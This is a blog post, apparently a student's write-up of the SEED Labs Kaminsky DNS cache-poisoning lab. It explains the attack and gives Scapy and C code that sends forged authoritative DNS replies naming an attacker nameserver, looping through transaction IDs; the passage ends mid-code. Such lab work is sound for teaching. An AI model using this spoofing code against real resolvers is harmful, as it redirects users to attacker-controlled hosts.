<!DOCTYPE html>
<html lang=en>
<head>
    <!-- so meta -->
    <meta charset="utf-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="HandheldFriendly" content="True">
    <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=5" />
    <meta name="description" content="Lab Overview Kaminsky DNS 攻击，是一种远程的 DNS 缓存污染攻击。 Lab Environment Setup (Task 1)本次实验需要用到四台机器，一台用于 Victim，一台用于 DNS Server，两台用于 Attacker。  环境配置和 Local DNS Attack 是一模一样的，区别只是在于这次实验不能嗅探包了。 The Attack Tasks正">
<meta property="og:type" content="article">
<meta property="og:title" content="The-Kaminsky-Attack-Lab">
<meta property="og:url" content="https://ceyewan.github.io/p/cc08d9b4.html">
<meta property="og:site_name" content="Ceyewan&#39;s Blog">
<meta property="og:description" content="Lab Overview Kaminsky DNS 攻击，是一种远程的 DNS 缓存污染攻击。 Lab Environment Setup (Task 1)本次实验需要用到四台机器，一台用于 Victim，一台用于 DNS Server，两台用于 Attacker。  环境配置和 Local DNS Attack 是一模一样的，区别只是在于这次实验不能嗅探包了。 The Attack Tasks正">
<meta property="og:locale" content="en_US">
<meta property="og:image" content="https://ceyewan.oss-cn-beijing.aliyuncs.com/typora/image-20240315182752600.png">
<meta property="og:image" content="https://ceyewan.oss-cn-beijing.aliyuncs.com/typora/image-20240317150931365.png">
<meta property="og:image" content="https://ceyewan.oss-cn-beijing.aliyuncs.com/typora/image-20240317151103556.png">
<meta property="og:image" content="https://ceyewan.oss-cn-beijing.aliyuncs.com/typora/image-20240317160031663.png">
<meta property="og:image" content="https://ceyewan.oss-cn-beijing.aliyuncs.com/typora/image-20240317160006589.png">
<meta property="og:image" content="https://ceyewan.oss-cn-beijing.aliyuncs.com/typora/image-20240317164909903.png">
<meta property="og:image" content="https://ceyewan.oss-cn-beijing.aliyuncs.com/typora/image-20240318003245124.png">
<meta property="og:image" content="https://ceyewan.oss-cn-beijing.aliyuncs.com/typora/image-20240318004235602.png">
<meta property="article:published_time" content="2024-03-23T17:13:23.000Z">
<meta property="article:modified_time" content="2024-03-23T17:15:17.422Z">
<meta property="article:author" content="ceyewan">
<meta property="article:tag" content="NetworkSecurity">
<meta property="article:tag" content="Kaminsky Attack">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://ceyewan.oss-cn-beijing.aliyuncs.com/typora/image-20240315182752600.png">
    
    
      
        
          <link rel="shortcut icon" href="/images/favicon.ico">
        
      
      
        
          <link rel="icon" type="image/png" href="/images/favicon-192x192.png" sizes="192x192">
        
      
      
        
          <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon.png">
        
      
    
    <!-- title -->
    <title>The-Kaminsky-Attack-Lab</title>
    <!-- async scripts -->
    <!-- Google Analytics -->


    <!-- Umami Analytics -->


    <!-- styles -->
    
<link rel="stylesheet" href="/css/style.css">

    <!-- persian styles -->
    
    <!-- rss -->
    
    
	<!-- mathjax -->
	
		<script type="text/x-mathjax-config">
		  MathJax.Hub.Config({
			tex2jax: {
			  skipTags: ['script', 'noscript', 'style', 'textarea', 'pre'],
			  inlineMath: [['$','$']]
			}
		  });
		</script>
		<script src='https://cdnjs.cloudflare.com/ajax/libs/mathjax/2.7.5/latest.js?config=TeX-MML-AM_CHTML' async></script>
	
<meta name="generator" content="Hexo 7.1.1"></head>

<body class="max-width mx-auto px3 ltr">
    
      <div id="header-post">
  <a id="menu-icon" href="#" aria-label="Menu"><i class="fa-solid fa-bars fa-lg"></i></a>
  <a id="menu-icon-tablet" href="#" aria-label="Menu"><i class="fa-solid fa-bars fa-lg"></i></a>
  <a id="top-icon-tablet" href="#" aria-label="Top" onclick="$('html, body').animate({ scrollTop: 0 }, 'fast');" style="display:none;"><i class="fa-solid fa-chevron-up fa-lg"></i></a>
  <span id="menu">
    <span id="nav">
      <ul>
        <!--
       --><li><a href="/">Home</a></li><!--
     --><!--
       --><li><a href="/categories/">Category</a></li><!--
     --><!--
       --><li><a href="/tags/">Tag</a></li><!--
     --><!--
       --><li><a href="/archives/">Writing</a></li><!--
     --><!--
       --><li><a href="/search/">Search</a></li><!--
     --><!--
       --><li><a href="/about/">About</a></li><!--
     -->
      </ul>
    </span>
    <br/>
    <span id="actions">
      <ul>
        
        <li><a class="icon" aria-label="Previous post" href="/p/c628f1dd.html"><i class="fa-solid fa-chevron-left" aria-hidden="true" onmouseover="$('#i-prev').toggle();" onmouseout="$('#i-prev').toggle();"></i></a></li>
        
        
        <li><a class="icon" aria-label="Next post" href="/p/86d17afc.html"><i class="fa-solid fa-chevron-right" aria-hidden="true" onmouseover="$('#i-next').toggle();" onmouseout="$('#i-next').toggle();"></i></a></li>
        
        <li><a class="icon" aria-label="Back to top" href="#" onclick="$('html, body').animate({ scrollTop: 0 }, 'fast');"><i class="fa-solid fa-chevron-up" aria-hidden="true" onmouseover="$('#i-top').toggle();" onmouseout="$('#i-top').toggle();"></i></a></li>
        <li><a class="icon" aria-label="Share post" href="#"><i class="fa-solid fa-share-alt" aria-hidden="true" onmouseover="$('#i-share').toggle();" onmouseout="$('#i-share').toggle();" onclick="$('#share').toggle();return false;"></i></a></li>
      </ul>
      <span id="i-prev" class="info" style="display:none;">Previous post</span>
      <span id="i-next" class="info" style="display:none;">Next post</span>
      <span id="i-top" class="info" style="display:none;">Back to top</span>
      <span id="i-share" class="info" style="display:none;">Share post</span>
    </span>
    <br/>
    <div id="share" style="display: none">
      <ul>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.facebook.com/sharer.php?u=https://ceyewan.github.io/p/cc08d9b4.html"><i class="fab fa-facebook " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://twitter.com/share?url=https://ceyewan.github.io/p/cc08d9b4.html&text=The-Kaminsky-Attack-Lab"><i class="fab fa-twitter " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.linkedin.com/shareArticle?url=https://ceyewan.github.io/p/cc08d9b4.html&title=The-Kaminsky-Attack-Lab"><i class="fab fa-linkedin " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://pinterest.com/pin/create/bookmarklet/?url=https://ceyewan.github.io/p/cc08d9b4.html&is_video=false&description=The-Kaminsky-Attack-Lab"><i class="fab fa-pinterest " aria-hidden="true"></i></a></li>
  <li><a class="icon" href="mailto:?subject=The-Kaminsky-Attack-Lab&body=Check out this article: https://ceyewan.github.io/p/cc08d9b4.html"><i class="fa-solid fa-envelope " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://getpocket.com/save?url=https://ceyewan.github.io/p/cc08d9b4.html&title=The-Kaminsky-Attack-Lab"><i class="fab fa-get-pocket " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://reddit.com/submit?url=https://ceyewan.github.io/p/cc08d9b4.html&title=The-Kaminsky-Attack-Lab"><i class="fab fa-reddit " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.stumbleupon.com/submit?url=https://ceyewan.github.io/p/cc08d9b4.html&title=The-Kaminsky-Attack-Lab"><i class="fab fa-stumbleupon " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://digg.com/submit?url=https://ceyewan.github.io/p/cc08d9b4.html&title=The-Kaminsky-Attack-Lab"><i class="fab fa-digg " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.tumblr.com/share/link?url=https://ceyewan.github.io/p/cc08d9b4.html&name=The-Kaminsky-Attack-Lab&description="><i class="fab fa-tumblr " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://news.ycombinator.com/submitlink?u=https://ceyewan.github.io/p/cc08d9b4.html&t=The-Kaminsky-Attack-Lab"><i class="fab fa-hacker-news " aria-hidden="true"></i></a></li>
</ul>

    </div>
    
    
      <div id="toc">
        <ol class="toc"><li class="toc-item toc-level-2"><a class="toc-link" href="#Lab-Overview"><span class="toc-number">1.</span> <span class="toc-text">Lab Overview</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Lab-Environment-Setup-Task-1"><span class="toc-number">2.</span> <span class="toc-text">Lab Environment Setup (Task 1)</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#The-Attack-Tasks"><span class="toc-number">3.</span> <span class="toc-text">The Attack Tasks</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#How-Kaminsky-attack-works"><span class="toc-number">4.</span> <span class="toc-text">How Kaminsky attack works</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Task-2-Construct-DNS-request"><span class="toc-number">5.</span> <span class="toc-text">Task 2: Construct DNS request</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Task-3-Spoof-DNS-Replies"><span class="toc-number">6.</span> <span class="toc-text">Task 3: Spoof DNS Replies</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Task-4-Launch-the-Kaminsky-Attack"><span class="toc-number">7.</span> <span class="toc-text">Task 4: Launch the Kaminsky Attack</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#Task-5-Result-Verification"><span class="toc-number">7.1.</span> <span class="toc-text">Task 5: Result Verification</span></a></li></ol></li></ol>
      </div>
    
  </span>
</div>

    
    <div class="content index py4 ">
        
        <article class="post h-entry" itemscope itemtype="http://schema.org/BlogPosting">
  <header>
    
    <h1 class="posttitle p-name" itemprop="name headline">
        The-Kaminsky-Attack-Lab
    </h1>



    <div class="meta">
      <span class="author p-author h-card" itemprop="author" itemscope itemtype="http://schema.org/Person">
        <span class="p-name" itemprop="name">ceyewan</span>
      </span>
      
    <div class="postdate">
      
        <time datetime="2024-03-23T17:13:23.000Z" class="dt-published" itemprop="datePublished">2024-03-24</time>
        
      
    </div>


      
    <div class="article-category">
        <i class="fa-solid fa-archive"></i>
        <a class="category-link" href="/categories/SeedLabs-NetworkSecurity/">SeedLabs/NetworkSecurity</a>
    </div>


      
    <div class="article-tag">
        <i class="fa-solid fa-tag"></i>
        <a class="p-category" href="/tags/Kaminsky-Attack/" rel="tag">Kaminsky Attack</a>, <a class="p-category" href="/tags/NetworkSecurity/" rel="tag">NetworkSecurity</a>
    </div>


    </div>
  </header>
  

  <div class="content e-content" itemprop="articleBody">
    <h2 id="Lab-Overview"><a href="#Lab-Overview" class="headerlink" title="Lab Overview"></a>Lab Overview</h2><p> Kaminsky DNS 攻击，是一种远程的 DNS 缓存污染攻击。</p>
<h2 id="Lab-Environment-Setup-Task-1"><a href="#Lab-Environment-Setup-Task-1" class="headerlink" title="Lab Environment Setup (Task 1)"></a>Lab Environment Setup (Task 1)</h2><p>本次实验需要用到四台机器，一台用于 Victim，一台用于 DNS Server，两台用于 Attacker。</p>
<p><img src="https://ceyewan.oss-cn-beijing.aliyuncs.com/typora/image-20240315182752600.png" alt="image-20240315182752600"></p>
<p>环境配置和 Local DNS Attack 是一模一样的，区别只是在于这次实验不能嗅探包了。</p>
<h2 id="The-Attack-Tasks"><a href="#The-Attack-Tasks" class="headerlink" title="The Attack Tasks"></a>The Attack Tasks</h2><p>正确的 DNS 查询过程是如下所示的：</p>
<p><img src="https://ceyewan.oss-cn-beijing.aliyuncs.com/typora/image-20240317150931365.png" alt="image-20240317150931365"></p>
<h2 id="How-Kaminsky-attack-works"><a href="#How-Kaminsky-attack-works" class="headerlink" title="How Kaminsky attack works"></a>How Kaminsky attack works</h2><p>当 Apollo 等待来自 example.com 名称服务器的 DNS 答复时，攻击者可以假装答复来自 example.com 的名称服务器，向 Apollo 发送伪造的答复。如果伪造的回复先到达，Apollo 就会 接受它。攻击就会成功。</p>
<p>当攻击者和域名服务器缓存污染攻击不在同一个局域网上时，缓存中毒攻击就变得更加困难。困难的主要原因是 DNS 响应包中的事务 ID 必须与查询包中的事务 ID 相匹配。由 于查询中的事务 ID 通常是随机生成的，而不会看到查询数据包，因此攻击者很难知道正确的 ID。</p>
<p>然而，除非我们轻易的猜测出正确的 ID，否则，一旦正确的响应到达就会被 Apollo 缓存，攻击者就必须等待缓存超时，等待时间可以是几个小时，也可以是几天。</p>
<p><img src="https://ceyewan.oss-cn-beijing.aliyuncs.com/typora/image-20240317151103556.png" alt="image-20240317151103556"></p>
<p>卡明斯基想出了一个优雅的技巧来对抗上述的缓存，从而可以使得攻击者能够持续的攻击域名上的 DNS 服务器。</p>
<ol>
<li>攻击者在 example.com 中向 Apollo 查询一个不存在的域名，比如 fake.example.com。</li>
<li>由于在 Apollo 的 DNS 缓存中不存在，Apollo 将向 example.com 域的 name-server 发送一 个 DNS 查询。</li>
<li>在 Apollo 等待回复的同时，攻击者向 Apollo 发送大量伪造的 DNS 响应流，每个都尝试不同的事务 ID， 希望其中一个是正确的。在响应中，攻击者不仅为 fake.example. com 提供了一个 IP 解析，还包含一个 “Authoritative Nameservers” 记录，指示 ns.attacker32.com 作为 example.com 域的 nameserver。</li>
<li>即使这一次没有猜测出来，下一次攻击将查询不同的名称，如 fake2.example.com，Apollo 必须发送另一个查询，这给了攻击者另一个机会。</li>
<li>如果攻击成功，Apollo 的缓存中，example.com 的名称服务器将会被 ns.attacker32.com 取代。</li>
</ol>
<h2 id="Task-2-Construct-DNS-request"><a href="#Task-2-Construct-DNS-request" class="headerlink" title="Task 2: Construct DNS request"></a>Task 2: Construct DNS request</h2><p>在这个任务中，我们要触发 DNS 服务器发送 DNS 查询，这样就有欺骗 DNS 应答。</p>
<figure class="highlight python"><table><tr><td class="code"><pre><span class="line"><span class="keyword">from</span> scapy.<span class="built_in">all</span> <span class="keyword">import</span> *</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">dns_query</span>(<span class="params">domin</span>):</span><br><span class="line">    dns_request = IP(dst=<span class="string">&#x27;10.9.0.53&#x27;</span>)/UDP(dport=<span class="number">53</span>) / \</span><br><span class="line">        DNS(<span class="built_in">id</span>=<span class="number">0xAAAA</span>, qr=<span class="number">0</span>, qdcount=<span class="number">1</span>, qd=DNSQR(qname=domin))</span><br><span class="line">    send(dns_request)</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">dns_query(<span class="string">&quot;fake&quot;</span>+<span class="built_in">str</span>(<span class="number">1</span>)+<span class="string">&quot;.example.com&quot;</span>)</span><br></pre></td></tr></table></figure>

<p>如上代码，发送 DNS 请求，查询 fake1.example.com。可以看到，数据包被发送给了 DNS 服务器，服务器也向根 DNS 发起了查询。然后有一些乱七八糟的东西，大概就是递归查询的过程。</p>
<p><img src="https://ceyewan.oss-cn-beijing.aliyuncs.com/typora/image-20240317160031663.png" alt="image-20240317160031663"></p>
<p>我们可以看到，最终查询到了最终的 DNS 服务器，得到了结果就是没有这个域名。</p>
<p><img src="https://ceyewan.oss-cn-beijing.aliyuncs.com/typora/image-20240317160006589.png" alt="image-20240317160006589"></p>
<h2 id="Task-3-Spoof-DNS-Replies"><a href="#Task-3-Spoof-DNS-Replies" class="headerlink" title="Task 3: Spoof DNS Replies"></a>Task 3: Spoof DNS Replies</h2><p>代码如下，其中源 IP 应该是 example.com 的名称服务器，经过查询可以知道是如下的两个 IP。</p>
<figure class="highlight python"><table><tr><td class="code"><pre><span class="line"><span class="keyword">from</span> scapy.<span class="built_in">all</span> <span class="keyword">import</span> *</span><br><span class="line"></span><br><span class="line">name = <span class="string">&quot;fake1.example.com&quot;</span></span><br><span class="line">domain = <span class="string">&quot;example.com&quot;</span></span><br><span class="line">ns = <span class="string">&quot;ns.attacker32.com&quot;</span></span><br><span class="line">Qdsec = DNSQR(qname=name)</span><br><span class="line">Anssec = DNSRR(rrname=name, <span class="built_in">type</span>=<span class="string">&#x27;A&#x27;</span>, rdata=<span class="string">&#x27;1.2.3.4&#x27;</span>, ttl=<span class="number">259200</span>)</span><br><span class="line">NSsec = DNSRR(rrname=domain, <span class="built_in">type</span>=<span class="string">&#x27;NS&#x27;</span>, rdata=ns, ttl=<span class="number">259200</span>)</span><br><span class="line">dns = DNS(<span class="built_in">id</span>=<span class="number">0xAAAA</span>, aa=<span class="number">1</span>, rd=<span class="number">1</span>, qr=<span class="number">1</span>, qdcount=<span class="number">1</span>, ancount=<span class="number">1</span>,</span><br><span class="line">          nscount=<span class="number">1</span>, arcount=<span class="number">0</span>, qd=Qdsec, an=Anssec, ns=NSsec)</span><br><span class="line">ip = IP(dst=<span class="string">&#x27;10.9.0.53&#x27;</span>, src=<span class="string">&#x27;199.43.135.53&#x27;</span>)  <span class="comment"># 199.43.133.53</span></span><br><span class="line">udp = UDP(dport=<span class="number">33333</span>, sport=<span class="number">53</span>, chksum=<span class="number">0</span>)</span><br><span class="line">reply = ip/udp/dns</span><br><span class="line">send(reply)</span><br></pre></td></tr></table></figure>

<p>使用 Wireshark 捕获，可以发现，确实发送了一个响应包。不过这个响应包 id 肯定不对，我们只是用来进行测试，发包是没有问题的。</p>
<p><img src="https://ceyewan.oss-cn-beijing.aliyuncs.com/typora/image-20240317164909903.png" alt="image-20240317164909903"></p>
<h2 id="Task-4-Launch-the-Kaminsky-Attack"><a href="#Task-4-Launch-the-Kaminsky-Attack" class="headerlink" title="Task 4: Launch the Kaminsky Attack"></a>Task 4: Launch the Kaminsky Attack</h2><p>现在我们可以把所有的东西放在一起进行卡明斯基袭击了。在攻击中，我们需要发送许多伪造的 DNS 回复，希望其中一个回复命中正确的交易号码，并比合法的回复更快到达。如果使用 Scapy，那么速度确实太慢了；如果使用 C 语言，那么构造伪造的 DNS 响应包太麻烦了。</p>
<p>我们使用混合方式，首先使用 Scapy 来生成一个 DNS 数据包模板，它存储在一个文件中。然后我们将这个模板加载到一个 C 程序中，对一些字段做一些小的修改，然后发送数据包 。</p>
<ol>
<li>生成 DNS 请求数据包</li>
</ol>
<figure class="highlight python"><table><tr><td class="code"><pre><span class="line"><span class="keyword">from</span> scapy.<span class="built_in">all</span> <span class="keyword">import</span> *</span><br><span class="line"></span><br><span class="line"><span class="comment"># chksum=0，表示不进行校验，后续我们修改数据就没关系</span></span><br><span class="line">dns_request = IP(dst=<span class="string">&#x27;10.9.0.53&#x27;</span>)/UDP(dport=<span class="number">53</span>, chksum=<span class="number">0</span>) / \</span><br><span class="line">    DNS(<span class="built_in">id</span>=<span class="number">0xAAAA</span>, qr=<span class="number">0</span>, qdcount=<span class="number">1</span>, qd=DNSQR(qname=<span class="string">&#x27;12345.example.com&#x27;</span>))</span><br><span class="line"></span><br><span class="line"><span class="keyword">with</span> <span class="built_in">open</span>(<span class="string">&#x27;ip_req.bin&#x27;</span>, <span class="string">&#x27;wb&#x27;</span>) <span class="keyword">as</span> f:</span><br><span class="line">    f.write(<span class="built_in">bytes</span>(dns_request))</span><br><span class="line">    dns_request.show()</span><br></pre></td></tr></table></figure>

<ol start="2">
<li>生成 DNS 响应数据包（其中源 IP 地址是正确的名称服务器，即下面截图中的  a.iana-servers.net ）</li>
</ol>
<figure class="highlight python"><table><tr><td class="code"><pre><span class="line"><span class="keyword">from</span> scapy.<span class="built_in">all</span> <span class="keyword">import</span> *</span><br><span class="line"></span><br><span class="line">Qdsec = DNSQR(qname=<span class="string">&quot;12345.example.com&quot;</span>)</span><br><span class="line">Anssec = DNSRR(rrname=<span class="string">&quot;12345.example.com&quot;</span>, <span class="built_in">type</span>=<span class="string">&#x27;A&#x27;</span>, rdata=<span class="string">&#x27;1.2.3.4&#x27;</span>, ttl=<span class="number">259200</span>)</span><br><span class="line">NSsec = DNSRR(rrname=<span class="string">&quot;example.com&quot;</span>, <span class="built_in">type</span>=<span class="string">&#x27;NS&#x27;</span>, rdata=<span class="string">&quot;ns.attacker32.com&quot;</span>, ttl=<span class="number">259200</span>)</span><br><span class="line">dns = DNS(<span class="built_in">id</span>=<span class="number">0xAAAA</span>, aa=<span class="number">1</span>, rd=<span class="number">0</span>, qr=<span class="number">1</span>, qdcount=<span class="number">1</span>, ancount=<span class="number">1</span>,</span><br><span class="line">          nscount=<span class="number">1</span>, arcount=<span class="number">0</span>, qd=Qdsec, an=Anssec, ns=NSsec)</span><br><span class="line">ip = IP(dst=<span class="string">&#x27;10.9.0.53&#x27;</span>, src=<span class="string">&#x27;199.43.135.53&#x27;</span>, chksum=<span class="number">0</span>)  <span class="comment"># 199.43.133.53</span></span><br><span class="line">udp = UDP(dport=<span class="number">33333</span>, sport=<span class="number">53</span>, chksum=<span class="number">0</span>)</span><br><span class="line">dns_reply = ip/udp/dns</span><br><span class="line"></span><br><span class="line"><span class="keyword">with</span> <span class="built_in">open</span>(<span class="string">&#x27;ip_resp.bin&#x27;</span>, <span class="string">&#x27;wb&#x27;</span>) <span class="keyword">as</span> f:</span><br><span class="line">    f.write(<span class="built_in">bytes</span>(dns_reply))</span><br><span class="line">    dns_reply.show()</span><br></pre></td></tr></table></figure>

<ol start="3">
<li>使用 C 语言，短时间构造大量的响应包。请求包我们需要修改域名前五个字符，响应包我们需要修改域名前五个字符和 ID。使用二进制查看器就可以知道这些字段在二进制文件中的偏移，如 vscode 插件 Hex editor。</li>
</ol>
<figure class="highlight c"><table><tr><td class="code"><pre><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string">&lt;arpa/inet.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string">&lt;stdio.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string">&lt;stdlib.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string">&lt;string.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string">&lt;time.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string">&lt;unistd.h&gt;</span></span></span><br><span class="line"></span><br><span class="line"><span class="meta">#<span class="keyword">define</span> MAX_FILE_SIZE 1000000</span></span><br><span class="line"></span><br><span class="line"><span class="comment">/* IP Header */</span></span><br><span class="line"><span class="class"><span class="keyword">struct</span> <span class="title">ipheader</span> &#123;</span></span><br><span class="line">  <span class="type">unsigned</span> <span class="type">char</span> iph_ihl : <span class="number">4</span>,       <span class="comment">// IP header length</span></span><br><span class="line">      iph_ver : <span class="number">4</span>;                 <span class="comment">// IP version</span></span><br><span class="line">  <span class="type">unsigned</span> <span class="type">char</span> iph_tos;           <span class="comment">// Type of service</span></span><br><span class="line">  <span class="type">unsigned</span> <span class="type">short</span> <span class="type">int</span> iph_len;      <span class="comment">// IP Packet length (data + header)</span></span><br><span class="line">  <span class="type">unsigned</span> <span class="type">short</span> <span class="type">int</span> iph_ident;    <span class="comment">// Identification</span></span><br><span class="line">  <span class="type">unsigned</span> <span class="type">short</span> <span class="type">int</span> iph_flag : <span class="number">3</span>, <span class="comment">// Fragmentation flags</span></span><br><span class="line">      iph_offset : <span class="number">13</span>;             <span class="comment">// Flags offset</span></span><br><span class="line">  <span class="type">unsigned</span> <span class="type">char</span> iph_ttl;           <span class="comment">// Time to Live</span></span><br><span class="line">  <span class="type">unsigned</span> <span class="type">char</span> iph_protocol;      <span class="comment">// Protocol type</span></span><br><span class="line">  <span class="type">unsigned</span> <span class="type">short</span> <span class="type">int</span> iph_chksum;   <span class="comment">// IP datagram checksum</span></span><br><span class="line">  <span class="class"><span class="keyword">struct</span> <span class="title">in_addr</span> <span class="title">iph_sourceip</span>;</span>     <span class="comment">// Source IP address</span></span><br><span class="line">  <span class="class"><span class="keyword">struct</span> <span class="title">in_addr</span> <span class="title">iph_destip</span>;</span>       <span class="comment">// Destination IP address</span></span><br><span class="line">&#125;;</span><br><span class="line"></span><br><span class="line"><span class="type">void</span> <span class="title function_">send_raw_packet</span><span class="params">(<span class="type">char</span> *buffer, <span class="type">int</span> pkt_size)</span>;</span><br><span class="line"><span class="type">void</span> <span class="title function_">send_dns_request</span><span class="params">(<span class="type">unsigned</span> <span class="type">char</span> *pkt, <span class="type">int</span> pktsize, <span class="type">char</span> *name)</span>;</span><br><span class="line"><span class="type">void</span> <span class="title function_">send_dns_response</span><span class="params">(<span class="type">unsigned</span> <span class="type">char</span> *pkt, <span class="type">int</span> pktsize, <span class="type">char</span> *name,</span></span><br><span class="line"><span class="params">                       <span class="type">unsigned</span> <span class="type">short</span> id)</span>;</span><br><span class="line"></span><br><span class="line"><span class="type">int</span> <span class="title function_">main</span><span class="params">()</span> &#123;</span><br><span class="line">  srand(time(<span class="literal">NULL</span>));</span><br><span class="line"></span><br><span class="line">  <span class="comment">// Load the DNS request packet from file</span></span><br><span class="line">  FILE *f_req = fopen(<span class="string">&quot;ip_req.bin&quot;</span>, <span class="string">&quot;rb&quot;</span>);</span><br><span class="line">  <span class="keyword">if</span> (!f_req) &#123;</span><br><span class="line">    perror(<span class="string">&quot;Can&#x27;t open &#x27;ip_req.bin&#x27;&quot;</span>);</span><br><span class="line">    <span class="built_in">exit</span>(<span class="number">1</span>);</span><br><span class="line">  &#125;</span><br><span class="line">  <span class="type">unsigned</span> <span class="type">char</span> ip_req[MAX_FILE_SIZE];</span><br><span class="line">  <span class="type">int</span> n_req = fread(ip_req, <span class="number">1</span>, MAX_FILE_SIZE, f_req);</span><br><span class="line"></span><br><span class="line">  <span class="comment">// Load the first DNS response packet from file</span></span><br><span class="line">  FILE *f_resp = fopen(<span class="string">&quot;ip_resp.bin&quot;</span>, <span class="string">&quot;rb&quot;</span>);</span><br><span class="line">  <span class="keyword">if</span> (!f_resp) &#123;</span><br><span class="line">    perror(<span class="string">&quot;Can&#x27;t open &#x27;ip_resp.bin&#x27;&quot;</span>);</span><br><span class="line">    <span class="built_in">exit</span>(<span class="number">1</span>);</span><br><span class="line">  &#125;</span><br><span class="line">  <span class="type">unsigned</span> <span class="type">char</span> ip_resp[MAX_FILE_SIZE];</span><br><span class="line">  <span class="type">int</span> n_resp = fread(ip_resp, <span class="number">1</span>, MAX_FILE_SIZE, f_resp);</span><br><span class="line"></span><br><span class="line">  <span class="type">char</span> a[<span class="number">26</span>] = <span class="string">&quot;abcdefghijklmnopqrstuvwxyz&quot;</span>;</span><br><span class="line">  <span class="type">unsigned</span> <span class="type">short</span> transid = (rand() % <span class="number">16</span>) &lt;&lt; <span class="number">12</span>;</span><br><span class="line">  <span class="keyword">while</span> (<span class="number">1</span>) &#123;</span><br><span class="line">    <span class="comment">// Generate a random name with length 5</span></span><br><span class="line">    <span class="type">char</span> name[<span class="number">6</span>];</span><br><span class="line">    name[<span class="number">5</span>] = <span class="string">&#x27;\0&#x27;</span>;</span><br><span class="line">    <span class="keyword">for</span> (<span class="type">int</span> k = <span class="number">0</span>; k &lt; <span class="number">5</span>; k++)</span><br><span class="line">      name[k] = a[rand() % <span class="number">26</span>];</span><br><span class="line"></span><br><span class="line">    <span class="comment">//############################################</span></span><br><span class="line">    <span class="comment">/* Step 1. Send a DNS request to the targeted local DNS server.</span></span><br><span class="line"><span class="comment">               This will trigger the DNS server to send out DNS queries */</span></span><br><span class="line"></span><br><span class="line">    <span class="comment">// ... Students should add code here.</span></span><br><span class="line">    send_dns_request(ip_req, n_req, name);</span><br><span class="line"></span><br><span class="line">    <span class="comment">/* Step 2. Send many spoofed responses to the targeted local DNS server,</span></span><br><span class="line"><span class="comment">               each one with a different transaction ID. */</span></span><br><span class="line"></span><br><span class="line">    <span class="comment">// ... Students should add code here.</span></span><br><span class="line">    <span class="keyword">for</span> (<span class="type">int</span> i = <span class="number">0</span>; i &lt; <span class="number">0x1000</span>; i++) &#123;</span><br><span class="line">      transid++;</span><br><span class="line">      <span class="built_in">printf</span>(<span class="string">&quot;name is %s, id is %d\n&quot;</span>, name, transid);</span><br><span class="line">      send_dns_response(ip_resp, n_resp, name, transid);</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="comment">//############################################</span></span><br><span class="line">  &#125;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="comment">/* Use for sending DNS request.</span></span><br><span class="line"><span class="comment"> * Add arguments to the function definition if needed.</span></span><br><span class="line"><span class="comment"> * */</span></span><br><span class="line"><span class="type">void</span> <span class="title function_">send_dns_request</span><span class="params">(<span class="type">unsigned</span> <span class="type">char</span> *pkt, <span class="type">int</span> pktsize, <span class="type">char</span> *name)</span> &#123;</span><br><span class="line">  <span class="comment">// Students need to implement this function</span></span><br><span class="line">  <span class="built_in">memcpy</span>(pkt + <span class="number">41</span>, name, <span class="number">5</span>);</span><br><span class="line">  send_raw_packet((<span class="type">char</span> *)pkt, pktsize);</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="comment">/* Use for sending forged DNS response.</span></span><br><span class="line"><span class="comment"> * Add arguments to the function definition if needed.</span></span><br><span class="line"><span class="comment"> * */</span></span><br><span class="line"><span class="type">void</span> <span class="title function_">send_dns_response</span><span class="params">(<span class="type">unsigned</span> <span class="type">char</span> *pkt, <span class="type">int</span> pktsize, <span class="type">char</span> *name,</span></span><br><span class="line"><span class="params">                       <span class="type">unsigned</span> <span class="type">short</span> id)</span> &#123;</span><br><span class="line">  <span class="comment">// Students need to implement this function</span></span><br><span class="line">  <span class="built_in">memcpy</span>(pkt + <span class="number">41</span>, name, <span class="number">5</span>);</span><br><span class="line">  <span class="built_in">memcpy</span>(pkt + <span class="number">64</span>, name, <span class="number">5</span>);</span><br><span class="line">  <span class="type">unsigned</span> <span class="type">short</span> transid = htons(id);</span><br><span class="line">  <span class="built_in">memcpy</span>(pkt + <span class="number">28</span>, (<span class="type">void</span> *)&amp;transid, <span class="number">2</span>);</span><br><span class="line">  send_raw_packet((<span class="type">char</span> *)pkt, pktsize);</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="comment">/* Send the raw packet out</span></span><br><span class="line"><span class="comment"> *    buffer: to contain the entire IP 